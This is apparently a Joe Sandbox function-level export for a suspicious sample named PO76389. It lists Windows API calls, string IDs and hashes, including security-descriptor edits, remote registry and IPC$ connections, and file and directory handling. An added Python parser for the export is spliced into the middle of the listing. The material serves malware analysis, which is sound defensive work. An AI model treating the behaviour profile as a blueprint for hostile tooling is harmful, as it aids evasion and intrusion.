                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0051BCBF), ref: 0051E4DF
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0051E4EF
                                                    • DestroyCursor.USER32(?), ref: 0051E4FE
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0051E51B
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0051E527
                                                      • Part of subcall function 004D1BC7: __wcsicmp_l.LIBCMT ref: 004D1C50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 3907162815-1154884017
                                                    • Opcode ID: 599a78591ee8650666699d63ca4d70a5ac7d399f6d03849b518b6c316a3e3013
                                                    • Instruction ID: 14a875b681f639061b13ba64b19e781d27683cb3ad1016979f3b6fc6b71a9857
                                                    • Opcode Fuzzy Hash: 599a78591ee8650666699d63ca4d70a5ac7d399f6d03849b518b6c316a3e3013
                                                    • Instruction Fuzzy Hash: 9061AE71500215BAEF14DF64DC86FEA7BB8BB08714F10451AF915E71D0EBB8A980DBA0
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 00500EFF
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00500F0F
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00500F1B
                                                    • __wsplitpath.LIBCMT ref: 00500F79
                                                    • _wcscat.LIBCMT ref: 00500F91
                                                    • _wcscat.LIBCMT ref: 00500FA3
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00500FB8
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00500FCC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00500FFE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0050101F
                                                    • _wcscpy.LIBCMT ref: 0050102B
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0050106A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                    • String ID: *.*
                                                    • API String ID: 3566783562-438819550
                                                    • Opcode ID: f1facbc340de90488c069845f6ebd043d77edfe2be65099bd6e89c604317e2e1
                                                    • Instruction ID: 259401b8db66a9c536d40c3b4f1e96ad7d5a27e73d65f6bd8acd14f9ddddc00f
                                                    • Opcode Fuzzy Hash: f1facbc340de90488c069845f6ebd043d77edfe2be65099bd6e89c604317e2e1
                                                    • Instruction Fuzzy Hash: 78618CB6504705AFC710EF20C854A9EB7E8FF89314F00881EF98997291EB35E945CBA6
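                                                     The function entries above are a flat-text export of Joe Sandbox's per-function blocks ("APIs", "Strings", "Memory Dump Source", "Similarity"). The following is an added example, not part of this report or of Joe Sandbox, that parses that export into records so the API sets, the "$"-joined strings and the Opcode/Instruction hash fields of this sample can be queried or diffed against another run. The sample input is a constructed excerpt condensed from two of the entries above (the tooltip-window function at 0051CD0B and the directory-walk function at 00500EFF) with most of their memory-dump lines dropped; the only format assumptions are the ones those entries show.

```python
"""Parse a plain-text Joe Sandbox per-function listing into queryable records.

Added example, not part of the report or of Joe Sandbox. Format assumptions,
taken from the listing itself: every entry opens with an 'APIs' header, API
lines read 'Name.MODULE(args), ref: ADDR', lines under 'Part of subcall
function' belong to a callee, and 'String ID' joins strings with '$'.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# One API line: optional subcall prefix, Name.MODULE, optional (args), 'ref: ADDR'.
API_LINE = re.compile(
    r"^•\s*(?P<sub>Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
# 'Key: value' lines of the Similarity block ('String ID:' may carry no value).
KV_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s?(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str        # call-site address exactly as printed (8 hex digits)
    subcall: bool   # True when the call sits inside a callee, not the function itself


@dataclass
class FunctionEntry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    ids: dict[str, str] = field(default_factory=dict)   # API String ID, Opcode ID, fuzzy hashes

    @property
    def start(self) -> str | None:
        """Lowest direct call-site address; a stand-in for the function's identity."""
        direct = [c.ref for c in self.apis if not c.subcall]
        return min(direct, key=lambda r: int(r, 16)) if direct else None


def parse_listing(text: str) -> list[FunctionEntry]:
    entries: list[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":              # each entry in the export opens with its API block
                entries.append(FunctionEntry())
            section = line
            continue
        if not entries:
            continue                        # text before the first entry
        cur = entries[-1]
        if section == "APIs" and (m := API_LINE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] is not None))
        elif section == "Similarity" and (kv := KV_LINE.match(line)):
            key, val = kv["key"].strip(), kv["val"]
            if key == "String ID":
                # Joe Sandbox joins the strings with '$'; a literal '$' inside a string
                # cannot be told apart from the separator, so this split is lossy.
                cur.strings = val.split("$") if val else []
            else:
                cur.ids[key] = val.strip()
    return entries


def call_sites(entries: list[FunctionEntry], api_name: str) -> list[str]:
    """Every printed call-site address of api_name, subcall lines included."""
    return sorted({c.ref for e in entries for c in e.apis if c.name == api_name})


def callers_of(entries: list[FunctionEntry], api_name: str) -> list[FunctionEntry]:
    """Entries whose own (non-subcall) API list contains api_name."""
    return [e for e in entries if any(c.name == api_name and not c.subcall for c in e.apis)]


# Constructed sample: two entries condensed from the listing above.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 0051CD0B
• DestroyWindow.USER32(?,?), ref: 0051CD83
  • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0051CE04
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0051CE26
• GetDesktopWindow.USER32 ref: 0051CEB9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Instruction Fuzzy Hash: 0771AB71180205AFE721CF68DC45FA63FE9FB89704F08051DF985972A1CB75E845DB26
APIs
• GetLocalTime.KERNEL32(?), ref: 00500EFF
• __wsplitpath.LIBCMT ref: 00500F79
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00500FB8
• SetCurrentDirectoryW.KERNEL32(?), ref: 00500FCC
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0050106A
Strings
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Instruction Fuzzy Hash: 78618CB6504705AFC710EF20C854A9EB7E8FF89314F00881EF98997291EB35E945CBA6
"""

if __name__ == "__main__":
    for e in parse_listing(SAMPLE):
        direct = [c.name for c in e.apis if not c.subcall]
        print(e.start, e.ids.get("API String ID"), direct, e.strings)
```

The `API String ID`, `Opcode ID` and fuzzy-hash fields are opaque values produced by Joe Sandbox; the parser keeps them as strings for equality matching between reports and does not attempt to interpret them. Subcall lines are retained but flagged, so `callers_of` can distinguish a function that itself calls an API from one that merely reaches it through a callee.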
                                                    APIs
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • CharLowerBuffW.USER32(?,?), ref: 004FDB26
                                                    • GetDriveTypeW.KERNEL32 ref: 004FDB73
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDBBB
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDBF2
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDC20
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: e36f9071ca116a1242feb9b2ee5d1c87b1ae76a9f376f662e27cca435a7d3a82
                                                    • Instruction ID: 92dfcfc8430f73820e70bf4c7b366a0c775f33711e5a3189f99e54334ed21407
                                                    • Opcode Fuzzy Hash: e36f9071ca116a1242feb9b2ee5d1c87b1ae76a9f376f662e27cca435a7d3a82
                                                    • Instruction Fuzzy Hash: 8C514771504205AFC700EF11C9819ABB7F9FF88758F00486EF895972A1DB75EE0ACB66
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00524085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 004F3145
                                                    • LoadStringW.USER32(00000000,?,00524085,00000016), ref: 004F314E
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00524085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 004F3170
                                                    • LoadStringW.USER32(00000000,?,00524085,00000016), ref: 004F3173
                                                    • __swprintf.LIBCMT ref: 004F31B3
                                                    • __swprintf.LIBCMT ref: 004F31C5
                                                    • _wprintf.LIBCMT ref: 004F326C
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F3283
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 984253442-2268648507
                                                    • Opcode ID: 021b772a0031c112d8d5a4cd935f62e4e5c78557238354118ae327c99ba33592
                                                    • Instruction ID: 825197bbeac793b1653b2394dcbcbd447a4ff6690cc61aa41457e70d9b8aa668
                                                    • Opcode Fuzzy Hash: 021b772a0031c112d8d5a4cd935f62e4e5c78557238354118ae327c99ba33592
                                                    • Instruction Fuzzy Hash: A641637190021DA6CB04FBE2DD86EEFB778AF14705F10046BF601B21A2DA696F08DA75
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004FD96C
                                                    • __swprintf.LIBCMT ref: 004FD98E
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 004FD9CB
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004FD9F0
                                                    • _memset.LIBCMT ref: 004FDA0F
                                                    • _wcsncpy.LIBCMT ref: 004FDA4B
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 004FDA80
                                                    • CloseHandle.KERNEL32(00000000), ref: 004FDA8B
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 004FDA94
                                                    • CloseHandle.KERNEL32(00000000), ref: 004FDA9E
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: 60f2ad88392e71580294c5976d9598f634d9f2971ddd94583a06a7d0eedfb95b
                                                    • Instruction ID: d9a7e391e1c64afbccb4ed3cf81b14e8f87803592e1b1f3c0ae738b7e864f8b5
                                                    • Opcode Fuzzy Hash: 60f2ad88392e71580294c5976d9598f634d9f2971ddd94583a06a7d0eedfb95b
                                                    • Instruction Fuzzy Hash: FB31C87290020CABDB20DFA4DC49FEB77BDBF94704F0081A6F615D2260E7749A45DBA5
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0051BD04,?,?), ref: 0051E564
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E57B
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E586
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E593
                                                    • GlobalLock.KERNEL32(00000000), ref: 0051E59C
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E5AB
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0051E5B4
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E5BB
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0051E5CC
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0053D9BC,?), ref: 0051E5E5
                                                    • GlobalFree.KERNEL32(00000000), ref: 0051E5F5
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0051E619
                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0051E644
                                                    • DeleteObject.GDI32(00000000), ref: 0051E66C
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0051E682
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: 292146e9dee5a22f2b2909a64a5fdee3d98ec28c9d66b45ad5069f73f546928f
                                                    • Instruction ID: 9844af0016f166d0c7f53f5b2eb47698fa0d1f85027bcf7366b8d65e5ac73891
                                                    • Opcode Fuzzy Hash: 292146e9dee5a22f2b2909a64a5fdee3d98ec28c9d66b45ad5069f73f546928f
                                                    • Instruction Fuzzy Hash: 9B414775600208AFDB119F64EC89EAFBBB9FF99715F108058F906D7260D731AD45EB20
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 00500C93
                                                    • _wcscat.LIBCMT ref: 00500CAB
                                                    • _wcscat.LIBCMT ref: 00500CBD
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00500CD2
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00500CE6
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00500CFE
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00500D18
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00500D2A
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: d941a217392c9e5d0db62b4f23e924b6eb6df45d224268d3a24b0fa43a9cc412
                                                    • Instruction ID: 9035e5c7dffc336b79db0604b6360ec0ec818193cfb9a5fa56a7e9de0bb77dc9
                                                    • Opcode Fuzzy Hash: d941a217392c9e5d0db62b4f23e924b6eb6df45d224268d3a24b0fa43a9cc412
                                                    • Instruction Fuzzy Hash: 608181715042059FD764DF64C844AAEBBE8BB89314F189D2EF885C72D1EA34DD84CBA2
                                                    APIs
                                                      • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                      • Part of subcall function 004EB8E7: GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                      • Part of subcall function 004EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                      • Part of subcall function 004EB8E7: RtlAllocateHeap.NTDLL(00000000,?,004EB3CB), ref: 004EB923
                                                      • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                      • Part of subcall function 004EB982: GetProcessHeap.KERNEL32(00000008,004EB3E1,00000000,00000000,?,004EB3E1,?), ref: 004EB98E
                                                      • Part of subcall function 004EB982: RtlAllocateHeap.NTDLL(00000000,?,004EB3E1), ref: 004EB995
                                                      • Part of subcall function 004EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004EB3E1,?), ref: 004EB9A6
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004EB5F7
                                                    • _memset.LIBCMT ref: 004EB60C
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004EB62B
                                                    • GetLengthSid.ADVAPI32(?), ref: 004EB63C
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 004EB679
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004EB695
                                                    • GetLengthSid.ADVAPI32(?), ref: 004EB6B2
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004EB6C1
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004EB6C8
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004EB6E9
                                                    • CopySid.ADVAPI32(00000000), ref: 004EB6F0
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004EB721
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004EB747
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004EB75B
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 2347767575-0
                                                    • Opcode ID: f5bc9b110eadc7d1b8f834f450e84f1e1cb21cb8c50ad47622c75a08c44987e9
                                                    • Instruction ID: 6c84a5bc43e2417e83d153ee0013836f26020c2d9307601bb530120de56e279d
                                                    • Opcode Fuzzy Hash: f5bc9b110eadc7d1b8f834f450e84f1e1cb21cb8c50ad47622c75a08c44987e9
                                                    • Instruction Fuzzy Hash: 05517D71900249ABCF049FA2DC89EEFBB79FF44745F04811AF911A6390D7349A05DBA4
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0050A2DD
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0050A2E9
                                                    • CreateCompatibleDC.GDI32(?), ref: 0050A2F5
                                                    • SelectObject.GDI32(00000000,?), ref: 0050A302
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0050A356
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0050A392
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0050A3B6
                                                    • SelectObject.GDI32(00000006,?), ref: 0050A3BE
                                                    • DeleteObject.GDI32(?), ref: 0050A3C7
                                                    • DeleteDC.GDI32(00000006), ref: 0050A3CE
                                                    • ReleaseDC.USER32(00000000,?), ref: 0050A3D9
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: ea1fb2718d7009968a79c786d3eb15fd41dd8a7171b80347fb865e02b4dcc2d1
                                                    • Instruction ID: ba8d197274adda968f6d601194e2de804e3aa196826ba52a737fcee9ad67b098
                                                    • Opcode Fuzzy Hash: ea1fb2718d7009968a79c786d3eb15fd41dd8a7171b80347fb865e02b4dcc2d1
                                                    • Instruction Fuzzy Hash: 65513875900309AFCB15CFA8D885AAEBBB9FF48710F14881DF95AA7350D731A945CB60
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|EV
                                                    • API String ID: 3964851224-1416026000
                                                    • Opcode ID: 7fc54dd81ff3040913fa26723cb27796016d4f6deb4f9f281e0c5246b6b5cdd1
                                                    • Instruction ID: 876a9b93500ca7c123cbfc64231aa2e6786a13f7f900c73cedafc0b3a615c94b
                                                    • Opcode Fuzzy Hash: 7fc54dd81ff3040913fa26723cb27796016d4f6deb4f9f281e0c5246b6b5cdd1
                                                    • Instruction Fuzzy Hash: 3F41A5341002468BEF04EF04D860BEA3B62BF2539CF54482DFC525B295DB389E89CBA4
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00523C64,00000010,00000000,Bad directive syntax error,0054DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 004F32D1
                                                    • LoadStringW.USER32(00000000,?,00523C64,00000010), ref: 004F32D8
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • _wprintf.LIBCMT ref: 004F3309
                                                    • __swprintf.LIBCMT ref: 004F332B
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F3395
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"W
                                                    • API String ID: 1506413516-1713381306
                                                    • Opcode ID: 7c0225d3b82ab86f9ae904780cfe2115565a6521e2e008b3a4833ec123943feb
                                                    • Instruction ID: ea72c2f0fbeaa3913db87984497da93f9aa006f781ebda5892f86f018ddd4982
                                                    • Opcode Fuzzy Hash: 7c0225d3b82ab86f9ae904780cfe2115565a6521e2e008b3a4833ec123943feb
                                                    • Instruction Fuzzy Hash: F621A03190021DBBCF01EFD1CC06EEE7B35BF24705F00085BF505A11A1DAB9AA58DB64
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF), ref: 004FD567
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 004FD589
                                                    • __swprintf.LIBCMT ref: 004FD5DC
                                                    • _wprintf.LIBCMT ref: 004FD68D
                                                    • _wprintf.LIBCMT ref: 004FD6AB
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2116804098-2391861430
                                                    • Opcode ID: c1d356ed6d3db3a7a608377b5c226e51dc72ae68baa3ef30968f6a07e9be0f13
                                                    • Instruction ID: 296fd86f560bed7cfbee55c745fbd70667b89e5c0f1c50c0e28b4e98c100acc7
                                                    • Instruction Fuzzy Hash: 3651D471D00109BBCB14EBA1DD86EEEB779AF14308F10445BF205A21A1DA796F48EB68
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 004FD37F
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004FD3A0
                                                    • __swprintf.LIBCMT ref: 004FD3F3
                                                    • _wprintf.LIBCMT ref: 004FD499
                                                    • _wprintf.LIBCMT ref: 004FD4B7
                                                    Similarity
                                                    • API ID: LoadString_wprintf$__swprintf_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                    • API String ID: 2116804098-3420473620
                                                    • Opcode ID: 86e4d020879c112159f51dc3924b257d4c87fdcd48b668a627ab831ba0236ff2
                                                    • Instruction ID: a6eed8346f16f404621c33b3109ea6ae0accaa01bc89546603a4caaa67d7da3e
                                                    • Instruction Fuzzy Hash: 2E51E271D00108BBCB14FBA1DD86EEEB779AF14309F10445BF205B21A1EA796F48EB64
                                                    APIs
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • _memset.LIBCMT ref: 004EAF74
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004EAFA9
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004EAFC5
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004EAFE1
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004EB00B
                                                    • CLSIDFromString.COMBASE(?,?), ref: 004EB033
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004EB03E
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004EB043
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 1411258926-22481851
                                                    • Opcode ID: 7ff807b118e5a84b76a1355c3aa25715558b456477fd383a2f5cfed5114391e7
                                                    • Instruction ID: c3e5335a9692f599a159f9eda1c3c0386021189c8e8914a41ca718cc566b8207
                                                    • Instruction Fuzzy Hash: 8D413C75C10229ABCF11EBA5DC859EEB778FF14704F00446AE801A3261EB74AE05CBA4
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 004F7226
                                                    • __swprintf.LIBCMT ref: 004F7233
                                                      • Part of subcall function 004D234B: __woutput_l.LIBCMT ref: 004D23A4
